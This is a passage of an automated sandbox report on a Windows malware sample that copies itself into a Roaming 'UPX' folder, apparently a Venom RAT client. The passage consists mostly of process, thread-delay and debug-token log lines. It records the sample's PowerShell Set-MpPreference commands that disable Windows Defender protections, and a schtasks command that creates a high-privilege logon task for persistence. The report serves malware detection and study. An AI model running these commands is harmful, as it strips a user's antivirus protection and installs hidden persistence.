      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe TID: 5712Thread sleep time: -21213755684765971s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe TID: 5712Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2756Thread sleep count: 9054 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5784Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exe TID: 5236Thread sleep count: 523 > 30Jump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exe TID: 5236Thread sleep time: -52300s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3000Thread sleep count: 8987 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4924Thread sleep time: -2767011611056431s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4924Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5108Thread sleep time: -4611686018427385s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5108Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2748Thread sleep count: 5428 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4672Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4672Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 816Thread sleep time: -4611686018427385s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5144Thread sleep count: 3533 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6124Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6076Thread sleep time: -2767011611056431s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6132Thread sleep count: 1922 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5436Thread sleep count: 2205 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5344Thread sleep count: 2110 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5032Thread sleep count: 1396 > 30
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeWindow / User API: threadDelayed 9671Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9054Jump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeWindow / User API: threadDelayed 523Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8987Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8669Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5428
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5425
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3533
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4657
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1922
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2205
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2110
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1396
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: powershell.exe, 00000004.00000003.387334338.00000000056B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
      Source: powershell.exe, 00000004.00000003.387334338.00000000056B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Gl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
      Source: JeCXrQSehB.exe, ??????uf2d9?u2eb3???????????.csReference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
      Source: JeCXrQSehB.exe, ??ua9f2?u3360??u2440u2249?uf7d7?????uec46?ufffd?.csReference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('??????????????+?????', 'GetProcAddress@kernel32.dll')
      Source: Client.exe.0.dr, ??ua9f2?u3360??u2440u2249?uf7d7?????uec46?ufffd?.csReference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('??????????????+?????', 'GetProcAddress@kernel32.dll')
      Source: Client.exe.0.dr, ??????uf2d9?u2eb3???????????.csReference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\JeCXrQSehB.exe" /rl HIGHEST /fJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Users\user\AppData\Roaming\UPX\Client.exe C:\Users\user\AppData\Roaming\UPX\Client.exeJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-MpPreference -verboseJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $trueJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $trueJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $trueJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $trueJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $trueJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -ForceJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6Jump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0Jump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6Jump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6Jump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $trueJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\UPX\Client.exe" /rl HIGHEST /fJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeQueries volume information: C:\Users\user\Desktop\JeCXrQSehB.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeQueries volume information: C:\Users\user\AppData\Roaming\UPX\Client.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
